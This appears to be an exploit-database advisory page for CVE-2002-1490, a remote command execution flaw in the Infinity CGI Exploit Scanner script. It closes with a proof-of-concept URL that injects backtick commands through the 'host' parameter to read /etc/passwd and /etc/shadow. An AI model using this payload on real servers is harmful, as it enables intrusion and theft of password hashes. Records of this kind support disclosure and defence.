header-logo
Suggest Exploit
vendor:
Infinity CGI Exploit Scanner
by:
Georgi Guninski
8,5
CVSS
HIGH
Remote Command Execution
78
CWE
Product Name: Infinity CGI Exploit Scanner
Affected Version From: Infinity CGI Exploit Scanner
Affected Version To: Infinity CGI Exploit Scanner
Patch Exists: No
Related CWE: CVE-2002-1490
CPE: a:infinity_cgi:infinity_cgi_exploit_scanner
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2002

Infinity CGI Exploit Scanner

Infinity CGI Exploit Scanner is prone to a remote command execution vulnerability. This is due to insufficient sanitization of input supplied via URI parameters. Exploitation could allow for execution of commands with the privileges of the web server process.

Mitigation:

No known mitigation
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/7913/info

Infinity CGI Exploit Scanner is prone to a remote command execution vulnerability. This is due to insufficient sanitization of input supplied via URI parameters. Exploitation could allow for execution of commands with the privileges of the web server process.

http://www.example.com/cgi-bin/nph-exploitscanget.cgi?host=`cat%20/etc/passwd``
cat%20/etc/shadow`&port=80&errchk=0&idsbypass=0